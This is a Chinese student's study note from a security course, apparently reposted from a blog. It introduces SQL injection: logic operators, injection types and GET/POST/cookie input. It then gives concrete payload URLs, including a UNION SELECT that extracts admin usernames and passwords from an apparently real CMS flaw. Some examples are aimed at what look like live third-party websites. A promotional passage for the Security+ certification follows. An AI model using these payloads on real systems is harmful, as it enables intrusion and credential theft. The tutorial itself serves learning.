【安全牛学习笔记】初识sql注入漏洞原理
网站没有对输入的字符进行过滤,导致输入的字符影响到网站数据的查询。
编程 数学逻辑思维 and or xor 且 或 否
或:有一个真就是真
且:有一个假就为假
否:相反
怎么找是否有注入漏洞?
第一个找符合参数链接的网站
第二个判断是否存在注入
第三个实施注入***
分析sql注入流程:
第一步 猜解表名
第二步 猜解列名
第三步 猜解内容
三大web提交方式:GET POST COOKIE
get:直接在浏览器上面访问地址
post:按钮事件(会员注册,文件上传等)
cookie:访问网站下面自带的身份验证的值
普通的注入没办法了,可以尝试大小写,编码等绕过
各大参数类型详解:字符型,数字型,搜索型
字符型:abcd。。。。。26个英文字母 中文
数字型:0-9
搜索型:搜索关键字
编程中对于字符型的数据是什么表示的?
0123456789 "a" 'b' a 变量 常量
各大类型下的注入:前面我们的注入基本都是数字型,前面注入语句都是基于数字型注入
字符型注入:
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='1 返回正常。
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='2 返回错误。
搜索型注入:
http://www.myhack58.com/product/list_search.aspx?search=Donic
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面,看来是没有admin这个表了
代码审计:南方数据0day 分析
http://www.xxx.com/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
http://www.chinafxhb.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
select * from News where BigClassName='"& BigClass &"' and SmallClassName='"‘union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 "' order by AddDate desc
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
转载于:https://blog.51cto.com/11672938/1977852
【安全牛学习笔记】初识sql注入漏洞原理相关推荐
- 【安全牛学习笔记】SQLMAP- 自动注入
课时92 SQLMAP- 自动注入 SQLMAP自动注入 开源sql注入漏洞检测.利用工具 检测动态页面中get/post参数.cookie.http头 数据榨取 文件系统访问 操作系统命令执行 引擎 ...
- 张小白的渗透之路(二)——SQL注入漏洞原理详解
SQL注入漏洞简介 乱七八糟的就不多说了,自己百度去 SQL注入原理 想要更好的学习SQL注入,那么我们就必须要深入的了解每种数据库的SQL语法及特性.下面通过一个经典的万能密码的例子带大家来拨开一下 ...
- 浅谈SQL注入漏洞原理及利用方式
1.SQL注入 原理: 在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行.漏洞产生于脚 ...
- 【SQL注入漏洞-01】SQL注入漏洞原理及分类
SQL注入简介 结构化查询语言(Structured Query Language,缩写︰SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言. SQL注入(SQL Injection)是一 ...
- 【安全牛学习笔记】反射型XSS***漏洞的原理及解决办法
发射型XSS 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理 3.漏洞危害 4.一些tips 5.如何避免&修复漏洞 直接将用户数据输出到浏览器,没有做安全处理 搜索: www-dat ...
- ASP.NET 4学习笔记(1) SQL注入攻击及解决方案.
一, 定义:所谓SQL注入攻击是应用程序开发人员未预期地把SQL代码传入到应用程序的过程,只有那些直接使用用户提供的值构造SQL语句的应用程序才会受影响. 例如原SQL代码为: select Orde ...
- 用友OA漏洞学习——test.jsp SQL注入漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现
- 致翔OA漏洞学习——msglog.aspx SQL注入漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现
- SQL注入漏洞简介、原理及防护
目录 1.SQL注入漏洞简介 2.SQL注入漏洞原理 3.SQL注入的分类 4.注入方法 5.SQL注入危害 6.SQL注入防护措施 1.SQL注入漏洞简介 SQL注入漏洞是Web层面最高位的漏洞之一 ...
- php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 最近频繁爆发各种0day,真是把大家累坏了.Drupal 7.31 SQL注入漏洞 ...
最新文章
- 科学家都解决不了的5个“简单”算法,你不来看看?
- Sqlite3的安装Windows
- 《Git in Practice》作者访谈:关于Git的八个问题
- mongodb 只查询某个字段
- 关于动态生成输入界面的一些想法及实践
- 大学计算机一级考试内容和范围,大学计算机一级考试.doc
- 可以输入也可以下拉选择的select
- linuxoracle查看用户权限_权限管理系统设计过程
- 富文本编辑器防xss攻击
- PIC单片机应用开发实践教程(一):MPLAB X IDE 开发环境安装
- 苹果系统备份文件服务器地址,苹果备份文件在哪里能找到?默认路径在这儿(不知道的进来看看)...
- Oracle中dual表的用途介绍
- 网络分析工具——WireShark的使用(超详细)
- java正则匹配ip_正则表达式匹配ip地址
- 平台级解决方案,平安给深圳的智慧工具箱
- cardboard的使用
- 基于区块链的分布式金融网络
- 广州智算科技有限公司前端面试题
- young GC和Full GC的区别、什么时候触发young gc和Full GC、如何优化GC
- NBA篮球图文直播室之数据排行榜设计
热门文章
- 你的努力,是否符合你的预期?
- 青云oracle,青云oracle工具下载
- java linux任务管理器_Linux系列教程(二十四)——Linux的系统管理
- quick time不可用是什么意思_农村谚语“不可不算,不可全算”是什么意思?
- 乌班图服务器应用,Ubuntu下安装Apache
- html5 图形水平运动,【分享】HTML5的Canvas制作3D动画效果分享
- 算法知识点——(3)监督学习——逻辑回归与线性回归
- 电脑屏幕变黄如何调整_办公室照明设计如何避免踩坑,四个要点必须注意
- python env虚拟环境
- delphi和python和halcon_【《zw版·Halcon与delphi系列原创教程》Halcon图层与常用绘图函数...